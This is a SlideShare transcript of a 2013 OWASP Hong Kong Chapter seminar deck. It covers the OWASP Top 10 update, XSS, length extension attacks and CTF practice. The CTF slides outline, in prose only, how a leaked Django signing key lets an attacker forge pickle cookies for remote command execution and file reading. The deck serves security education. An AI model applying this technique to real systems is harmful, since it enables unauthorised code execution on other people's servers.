SlideShare uma empresa Scribd logo
1 de 38
Baixar para ler offline
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
OWASP Half-Day Event
(Hong Kong Chapter)
Anthony LAI
Chapter Leader
{Alan HO, Zetta KE}
Chapter Researcher
OWASP (Hong Kong Chapter)
July 2013
2OWASP
OWASP Standard
Web application security and awareness
Top 10, coding guidelines and tools
Well-known industry standard set up for nearly
10 years.
Good reference for web application developer,
security officer, penetration tester, IT security
management, compliance officer and auditor.
3OWASP
OWASP Membership and Our Approach
Membership launched
APAC Chapters 20 USD per year for individual
member ( 抵到爛 !)
Corporate member is welcomed (5000 USD per
year)
We commit to give 3-4 half-day events per year
From next seminar, only paid member could join
the event.
No bullshit, no sales talk, no starch, practical
work and research. :-)
4OWASP
RIP. He passed away in SF before Blackhat
(disclosing hack against heart pacemaker)
5OWASP
Speaker Profiles
6OWASP
Speaker Biography and Introduction
Alan HO
Worked as Application Security specialist
Experienced developer
Passionate over Android and Web hacking
VXRL security researcher and CTF crew member
 SANS GWAPT (Gold paper) holder
7OWASP
Speaker Biography and Introduction
Zetta KE
PhD Student in Information System in HKUST
VXRL Researcher and CTF MVP (Most Valuable Player)
Passionate over Web hack, Crypto and PHP
Leading web hack and penetration workshops in
Polytechnic university and HKPC with Anthony Lai.
8OWASP
Speaker Biography and Introduction
Anthony LAI
Chapter Leader, OWASP HK Chapter
Founder and Researcher, VXRL
Focus on penetration test, reverse engineering,
malware analysis and incident response.
Passionate over CTF wargame
Speaking at DEFCON 18-20, Blackhat USA 2010,
AVTokyo 2011-2012, HITCON 2010-2011, Codegate
2012 and HTCIA APAC Conference 2012
SANS GWAPT, GREM and GCFA mentor
9OWASP
Agenda
Introduction
(10 minutes)
OWASP Top 10 2013 Update (Anthony)
(15-20 minutes)
XSS flaws in mobile phone browser (Alan)
(30-40 minutes)
15 minutes break
Length Extension Attack (Zetta)
30-40 minutes
CTF for fun and profit (Anthony)
15 - 20 minutes
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
OWASP Top 10 2013 Update
Anthony LAI
Chapter Leader
OWASP (Hong Kong Chapter)
anthonylai@owasp.org
<phone>
July 2013
11OWASP
We have got an update this year
12OWASP
OWASP Top 10: 2010 Vs 2013
13OWASP
OWASP Top 10: 2010 Vs 2013
14OWASP
How to interpret each Top 10 item?
Threat, vulnerability and risk
15OWASP
How to interpret each Top 10 item?
Threat, vulnerability and risk
16OWASP
How to interpret each Top 10 item?
Exposure, vulnerable scenario, fix and references
17OWASP
OWASP Top 10 Details and follow up
Left to you to read over
It is a process you must walk through
Identify the top items on your managed or
owned web applications.
Implement guidelines and policy with reference
to OWASP standard.
18OWASP
Alan's show time:
Mobile Phone's Browser XSS
(SANS gold paper published)
19OWASP
Break Time: 15 minutes
Relax a bit … :)
20OWASP
Zetta's show time: Length
Extension Attack (LEA)
21OWASP
CTF (Capture The Flag for
Fun and Profit)
22OWASP
What is CTF game?
You need to get the key for points
Challenges include crypto, network, forensics,
binary/reverse engineering/exploitation, web
hack and miscellaneous.
Top teams could enter final round of contest
DEFCON, Plaid CTF, Codegate, Secuinside are
famous CTFs in the planet and we join every
year.
23OWASP
Why do we enjoy to play?
Challenges are practical
Need your knowledge
Need your skills
Understanding vulnerabilities
Thinking like an attacker
Train you up to manipulate proper tools
24OWASP
Our rank? Any rewards?
Www.ctftime.org
4th
prize in HITCON CTF 2013 (19-20 July,
Taipei)
25OWASP
Our world ranking
26OWASP
Sample Question (1)
Please read the following code, how can you
solve it?
27OWASP
Sample Question (1)
Please read the following code, how can you
solve it?
28OWASP
Question 1
There are a couple of things to note:
We must do the operations in reverse order since
this is the inverse function.
The hex2bin function is only available in PHP >=
5.4.0. Had to resort to the documentation to find
the alternative: pack ("H*", $str)
29OWASP
Sample Question (2)
How about this? Let us do it together:
http://natas14.natas.labs.overthewire.org/
30OWASP
Sample Question (2)
Remember the basic :)
31OWASP
Question (3) – Django RCE Vulnerability
HITCON 2013 Pwn500 question
Django Remote Code Execution (RCE) vulnerability
In Django, there is a library called Pickle to serialize the
Django object into a string and put cookie is signed with
key. The reverse action is called “Unpickle”.
However, “Pickle” library has always trusted the data which
is passed in without validation
Discovered in Y2011.
32OWASP
A Vulnerable Django
https://github.com/OrangeTW/Vulnerable-Django/
33OWASP
If the key leaks
We could generate our own cookie and sign it over.
34OWASP
We even could include command execution
1. Generate and sign the new cookie
with command execution
2. Replace the original cookie with our
generated one.
35OWASP
Pwned :)
(Simply input Guest, type in some text in
box and submit)
36OWASP
More than that, we could get the key from
the server to change our command to read
file instead ...
37OWASP
CTF fun and profit
The fun is to practice our security and “kungfu”
The profit is to earning knowledge, building trust
and friendship.
Sometimes, we could get reward :)
38OWASP
Thank you for your listening
anthonylai@owasp.org
alanh0@vxrl.org
Ozetta@vxrl.org
P.S: Non-members cannot get the slide for sure, it depends on the willingness of speakers to share the
slide or not

Mais conteúdo relacionado

Semelhante a OWASP Top 10 2013 x CTF Fun and Profit

OWASP top10 2017, Montpellier JUG de Noel
OWASP top10 2017, Montpellier JUG de NoelOWASP top10 2017, Montpellier JUG de Noel
OWASP top10 2017, Montpellier JUG de NoelHubert Gregoire
 
Protección web con ESAPI y AppSensor [GuadalajaraCON 2013]
Protección web con ESAPI y AppSensor [GuadalajaraCON 2013]Protección web con ESAPI y AppSensor [GuadalajaraCON 2013]
Protección web con ESAPI y AppSensor [GuadalajaraCON 2013]Websec México, S.C.
 
A Backpack to go the Extra-Functional Mile (a hitched hike by the PROWESS pro...
A Backpack to go the Extra-Functional Mile (a hitched hike by the PROWESS pro...A Backpack to go the Extra-Functional Mile (a hitched hike by the PROWESS pro...
A Backpack to go the Extra-Functional Mile (a hitched hike by the PROWESS pro...Laura M. Castro
 
Teaching Elephants to Dance (and Fly!): A Developer's Journey to Digital Tran...
Teaching Elephants to Dance (and Fly!): A Developer's Journey to Digital Tran...Teaching Elephants to Dance (and Fly!): A Developer's Journey to Digital Tran...
Teaching Elephants to Dance (and Fly!): A Developer's Journey to Digital Tran...Burr Sutter
 
Owasp tools - OWASP Serbia
Owasp tools - OWASP SerbiaOwasp tools - OWASP Serbia
Owasp tools - OWASP SerbiaNikola Milosevic
 
Owasp top 10 2017 (en)
Owasp top 10 2017 (en)Owasp top 10 2017 (en)
Owasp top 10 2017 (en)PrashantDhakol
 
OWASP_Top_10-2017_(en).pdf.pdf
OWASP_Top_10-2017_(en).pdf.pdfOWASP_Top_10-2017_(en).pdf.pdf
OWASP_Top_10-2017_(en).pdf.pdfSamSepiolRhodes
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
 
Owasp top 10-2017
Owasp top 10-2017Owasp top 10-2017
Owasp top 10-2017malvvv
 
Open source software for startups
Open source software for startupsOpen source software for startups
Open source software for startupsvictorneo
 
Buildinga billionuserloadbalancer may2015-sre-con15europe-shuff
Buildinga billionuserloadbalancer may2015-sre-con15europe-shuffBuildinga billionuserloadbalancer may2015-sre-con15europe-shuff
Buildinga billionuserloadbalancer may2015-sre-con15europe-shuffPatrick Shuff
 
OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1Telefónica
 
Owasp top 10 2013
Owasp top 10   2013Owasp top 10   2013
Owasp top 10 2013Aryan G
 

Semelhante a OWASP Top 10 2013 x CTF Fun and Profit (20)

OWASP Bulgaria
OWASP BulgariaOWASP Bulgaria
OWASP Bulgaria
 
OWASP top10 2017, Montpellier JUG de Noel
OWASP top10 2017, Montpellier JUG de NoelOWASP top10 2017, Montpellier JUG de Noel
OWASP top10 2017, Montpellier JUG de Noel
 
Protección web con ESAPI y AppSensor [GuadalajaraCON 2013]
Protección web con ESAPI y AppSensor [GuadalajaraCON 2013]Protección web con ESAPI y AppSensor [GuadalajaraCON 2013]
Protección web con ESAPI y AppSensor [GuadalajaraCON 2013]
 
OWASP an Introduction
OWASP an Introduction OWASP an Introduction
OWASP an Introduction
 
A Backpack to go the Extra-Functional Mile (a hitched hike by the PROWESS pro...
A Backpack to go the Extra-Functional Mile (a hitched hike by the PROWESS pro...A Backpack to go the Extra-Functional Mile (a hitched hike by the PROWESS pro...
A Backpack to go the Extra-Functional Mile (a hitched hike by the PROWESS pro...
 
Teaching Elephants to Dance (and Fly!): A Developer's Journey to Digital Tran...
Teaching Elephants to Dance (and Fly!): A Developer's Journey to Digital Tran...Teaching Elephants to Dance (and Fly!): A Developer's Journey to Digital Tran...
Teaching Elephants to Dance (and Fly!): A Developer's Journey to Digital Tran...
 
OWASP Top Ten 2013
OWASP Top Ten 2013OWASP Top Ten 2013
OWASP Top Ten 2013
 
UCLA HACKU'11
UCLA HACKU'11UCLA HACKU'11
UCLA HACKU'11
 
Owasp tools - OWASP Serbia
Owasp tools - OWASP SerbiaOwasp tools - OWASP Serbia
Owasp tools - OWASP Serbia
 
OISF - AppSec Presentation
OISF - AppSec PresentationOISF - AppSec Presentation
OISF - AppSec Presentation
 
Yahoo is open to developers
Yahoo is open to developersYahoo is open to developers
Yahoo is open to developers
 
Owasp top 10 2017 (en)
Owasp top 10 2017 (en)Owasp top 10 2017 (en)
Owasp top 10 2017 (en)
 
OWASP_Top_10-2017_(en).pdf.pdf
OWASP_Top_10-2017_(en).pdf.pdfOWASP_Top_10-2017_(en).pdf.pdf
OWASP_Top_10-2017_(en).pdf.pdf
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1
 
Owasp top 10-2017
Owasp top 10-2017Owasp top 10-2017
Owasp top 10-2017
 
Open source software for startups
Open source software for startupsOpen source software for startups
Open source software for startups
 
Owasp Serbia overview
Owasp Serbia overviewOwasp Serbia overview
Owasp Serbia overview
 
Buildinga billionuserloadbalancer may2015-sre-con15europe-shuff
Buildinga billionuserloadbalancer may2015-sre-con15europe-shuffBuildinga billionuserloadbalancer may2015-sre-con15europe-shuff
Buildinga billionuserloadbalancer may2015-sre-con15europe-shuff
 
OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1
 
Owasp top 10 2013
Owasp top 10   2013Owasp top 10   2013
Owasp top 10 2013
 

Último

UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7DianaGray10
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopBachir Benyammi
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...DianaGray10
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfDaniel Santiago Silva Capera
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXTarek Kalaji
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDELiveplex
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 

Último (20)

UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 Workshop
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBX
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 

OWASP Top 10 2013 x CTF Fun and Profit

  • 1. Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org OWASP Half-Day Event (Hong Kong Chapter) Anthony LAI Chapter Leader {Alan HO, Zetta KE} Chapter Researcher OWASP (Hong Kong Chapter) July 2013
  • 2. 2OWASP OWASP Standard Web application security and awareness Top 10, coding guidelines and tools Well-known industry standard set up for nearly 10 years. Good reference for web application developer, security officer, penetration tester, IT security management, compliance officer and auditor.
  • 3. 3OWASP OWASP Membership and Our Approach Membership launched APAC Chapters 20 USD per year for individual member ( 抵到爛 !) Corporate member is welcomed (5000 USD per year) We commit to give 3-4 half-day events per year From next seminar, only paid member could join the event. No bullshit, no sales talk, no starch, practical work and research. :-)
  • 4. 4OWASP RIP. He passed away in SF before Blackhat (disclosing hack against heart pacemaker)
  • 6. 6OWASP Speaker Biography and Introduction Alan HO Worked as Application Security specialist Experienced developer Passionate over Android and Web hacking VXRL security researcher and CTF crew member  SANS GWAPT (Gold paper) holder
  • 7. 7OWASP Speaker Biography and Introduction Zetta KE PhD Student in Information System in HKUST VXRL Researcher and CTF MVP (Most Valuable Player) Passionate over Web hack, Crypto and PHP Leading web hack and penetration workshops in Polytechnic university and HKPC with Anthony Lai.
  • 8. 8OWASP Speaker Biography and Introduction Anthony LAI Chapter Leader, OWASP HK Chapter Founder and Researcher, VXRL Focus on penetration test, reverse engineering, malware analysis and incident response. Passionate over CTF wargame Speaking at DEFCON 18-20, Blackhat USA 2010, AVTokyo 2011-2012, HITCON 2010-2011, Codegate 2012 and HTCIA APAC Conference 2012 SANS GWAPT, GREM and GCFA mentor
  • 9. 9OWASP Agenda Introduction (10 minutes) OWASP Top 10 2013 Update (Anthony) (15-20 minutes) XSS flaws in mobile phone browser (Alan) (30-40 minutes) 15 minutes break Length Extension Attack (Zetta) 30-40 minutes CTF for fun and profit (Anthony) 15 - 20 minutes
  • 10. Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org OWASP Top 10 2013 Update Anthony LAI Chapter Leader OWASP (Hong Kong Chapter) anthonylai@owasp.org <phone> July 2013
  • 11. 11OWASP We have got an update this year
  • 12. 12OWASP OWASP Top 10: 2010 Vs 2013
  • 13. 13OWASP OWASP Top 10: 2010 Vs 2013
  • 14. 14OWASP How to interpret each Top 10 item? Threat, vulnerability and risk
  • 15. 15OWASP How to interpret each Top 10 item? Threat, vulnerability and risk
  • 16. 16OWASP How to interpret each Top 10 item? Exposure, vulnerable scenario, fix and references
  • 17. 17OWASP OWASP Top 10 Details and follow up Left to you to read over It is a process you must walk through Identify the top items on your managed or owned web applications. Implement guidelines and policy with reference to OWASP standard.
  • 18. 18OWASP Alan's show time: Mobile Phone's Browser XSS (SANS gold paper published)
  • 19. 19OWASP Break Time: 15 minutes Relax a bit … :)
  • 20. 20OWASP Zetta's show time: Length Extension Attack (LEA)
  • 21. 21OWASP CTF (Capture The Flag for Fun and Profit)
  • 22. 22OWASP What is CTF game? You need to get the key for points Challenges include crypto, network, forensics, binary/reverse engineering/exploitation, web hack and miscellaneous. Top teams could enter final round of contest DEFCON, Plaid CTF, Codegate, Secuinside are famous CTFs in the planet and we join every year.
  • 23. 23OWASP Why do we enjoy to play? Challenges are practical Need your knowledge Need your skills Understanding vulnerabilities Thinking like an attacker Train you up to manipulate proper tools
  • 24. 24OWASP Our rank? Any rewards? Www.ctftime.org 4th prize in HITCON CTF 2013 (19-20 July, Taipei)
  • 26. 26OWASP Sample Question (1) Please read the following code, how can you solve it?
  • 27. 27OWASP Sample Question (1) Please read the following code, how can you solve it?
  • 28. 28OWASP Question 1 There are a couple of things to note: We must do the operations in reverse order since this is the inverse function. The hex2bin function is only available in PHP >= 5.4.0. Had to resort to the documentation to find the alternative: pack ("H*", $str)
  • 29. 29OWASP Sample Question (2) How about this? Let us do it together: http://natas14.natas.labs.overthewire.org/
  • 31. 31OWASP Question (3) – Django RCE Vulnerability HITCON 2013 Pwn500 question Django Remote Code Execution (RCE) vulnerability In Django, there is a library called Pickle to serialize the Django object into a string and put cookie is signed with key. The reverse action is called “Unpickle”. However, “Pickle” library has always trusted the data which is passed in without validation Discovered in Y2011.
  • 33. 33OWASP If the key leaks We could generate our own cookie and sign it over.
  • 34. 34OWASP We even could include command execution 1. Generate and sign the new cookie with command execution 2. Replace the original cookie with our generated one.
  • 35. 35OWASP Pwned :) (Simply input Guest, type in some text in box and submit)
  • 36. 36OWASP More than that, we could get the key from the server to change our command to read file instead ...
  • 37. 37OWASP CTF fun and profit The fun is to practice our security and “kungfu” The profit is to earning knowledge, building trust and friendship. Sometimes, we could get reward :)
  • 38. 38OWASP Thank you for your listening anthonylai@owasp.org alanh0@vxrl.org Ozetta@vxrl.org P.S: Non-members cannot get the slide for sure, it depends on the willingness of speakers to share the slide or not